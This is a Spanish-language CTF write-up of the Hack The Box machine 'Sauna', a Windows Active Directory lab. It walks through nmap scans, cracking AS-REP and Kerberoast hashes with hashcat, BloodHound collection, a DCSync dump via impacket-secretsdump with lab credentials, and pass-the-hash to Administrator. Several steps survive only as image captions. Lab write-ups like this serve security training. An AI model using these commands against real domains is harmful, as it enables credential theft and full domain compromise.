Zona Hacking — Writeups de CTFs y Seguridad Ofensiva

Sistema operativo	Dificultad	Fecha de Lanzamiento	Creador
Windows	Easy	15 Febrero 2020	egotisticalSW

Escaneo de puertos

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.175
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 19:45 -03
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.175 [65535 ports]
Discovered open port 135/tcp on 10.10.10.175
Discovered open port 80/tcp on 10.10.10.175
Discovered open port 53/tcp on 10.10.10.175
Discovered open port 139/tcp on 10.10.10.175
Discovered open port 445/tcp on 10.10.10.175
Discovered open port 49696/tcp on 10.10.10.175
Discovered open port 49673/tcp on 10.10.10.175
Discovered open port 49668/tcp on 10.10.10.175
Discovered open port 9389/tcp on 10.10.10.175
Discovered open port 49689/tcp on 10.10.10.175
Discovered open port 49677/tcp on 10.10.10.175
Discovered open port 389/tcp on 10.10.10.175
Discovered open port 3268/tcp on 10.10.10.175
Discovered open port 49674/tcp on 10.10.10.175
Discovered open port 5985/tcp on 10.10.10.175
Discovered open port 88/tcp on 10.10.10.175
Discovered open port 593/tcp on 10.10.10.175
Discovered open port 464/tcp on 10.10.10.175
Discovered open port 636/tcp on 10.10.10.175
Discovered open port 3269/tcp on 10.10.10.175
Completed SYN Stealth Scan at 19:45, 41.26s elapsed (65535 total ports)
Nmap scan report for 10.10.10.175
Host is up, received user-set (0.34s latency).
Scanned at 2025-04-27 19:45:10 -03 for 41s
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49668/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49677/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49696/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 41.60 seconds
           Raw packets sent: 196589 (8.650MB) | Rcvd: 47 (2.068KB)

Enumeración de versión y servicio

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49696 -oN servicesScan 10.10.10.175 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 19:45 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
Initiating Ping Scan at 19:45
Scanning 10.10.10.175 [4 ports]
Completed Ping Scan at 19:45, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:45
Completed Parallel DNS resolution of 1 host. at 19:45, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.175 (10.10.10.175) [20 ports]
Discovered open port 80/tcp on 10.10.10.175
Discovered open port 135/tcp on 10.10.10.175
Discovered open port 53/tcp on 10.10.10.175
Discovered open port 445/tcp on 10.10.10.175
Discovered open port 139/tcp on 10.10.10.175
Discovered open port 5985/tcp on 10.10.10.175
Discovered open port 88/tcp on 10.10.10.175
Discovered open port 593/tcp on 10.10.10.175
Discovered open port 464/tcp on 10.10.10.175
Discovered open port 389/tcp on 10.10.10.175
Discovered open port 49673/tcp on 10.10.10.175
Discovered open port 49677/tcp on 10.10.10.175
Discovered open port 3268/tcp on 10.10.10.175
Discovered open port 49668/tcp on 10.10.10.175
Discovered open port 9389/tcp on 10.10.10.175
Discovered open port 3269/tcp on 10.10.10.175
Discovered open port 49696/tcp on 10.10.10.175
Discovered open port 636/tcp on 10.10.10.175
Discovered open port 49689/tcp on 10.10.10.175
Discovered open port 49674/tcp on 10.10.10.175
Completed SYN Stealth Scan at 19:46, 0.54s elapsed (20 total ports)
Initiating Service scan at 19:46
Scanning 20 services on 10.10.10.175 (10.10.10.175)
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+)&nbsp;&nbsp;&nbsp;'
Completed Service scan at 19:46, 58.25s elapsed (20 services on 1 host)
NSE: Script scanning 10.10.10.175.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:46
NSE Timing: About 99.96% done; ETC: 19:47 (0:00:00 remaining)
Completed NSE at 19:47, 41.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 7.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
Nmap scan report for 10.10.10.175 (10.10.10.175)
Host is up, received echo-reply ttl 127 (0.26s latency).
Scanned at 2025-04-27 19:45:59 -03 for 108s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-28 05:46:09Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-28T05:47:02
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m01s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35558/tcp): CLEAN (Timeout)
|   Check 2 (port 21516/tcp): CLEAN (Timeout)
|   Check 3 (port 57297/udp): CLEAN (Timeout)
|   Check 4 (port 34032/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.37 seconds
           Raw packets sent: 24 (1.032KB) | Rcvd: 21 (908B)

Explotación inicial

echo '10.10.10.175 EGOTISTICAL-BANK.LOCAL' >> /etc/hosts

HTTP 80

Sauna

En la web encontramos distintos nombres, los cuales podemos utilizar para armar una lista de posibles usuarios.

Podemos usar este script para generar una lista de usuarios.

Sauna

hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt

Sauna

hashcat -m 13100 hsmith.kerberoast /usr/share/wordlists/rockyou.txt

Sauna

Bloodhound

bloodhound-python -u 'fsmith' -p 'Thestrokes23' -d egotistical-bank.local -ns 10.10.10.175 --zip -c All

Sauna

Escalación de privilegios

DCSync

Abusamos del DCSync para dumpear los hashes de la base de datos del AD.

impacket-secretsdump egotistical-bank.local/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e8c2f33115926459120e0a7cbfa6f255:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:d927ded149964b0408f0a4b6d82a89141427bd04e0771a303adff81391f9a33a
SAUNA$:aes128-cts-hmac-sha1-96:9574e71cb84668b6610998dc59a50803
SAUNA$:des-cbc-md5:b646158af7ad0da7
[*] Cleaning up...

Nos conectamos al sistema como el usuario Administrator haciendo un Pass The Hash.

Sauna

Sauna Sauna

Escaneo de puertos

Enumeración de versión y servicio

Explotación inicial

HTTP 80

Escalación de privilegios

DCSync

Sauna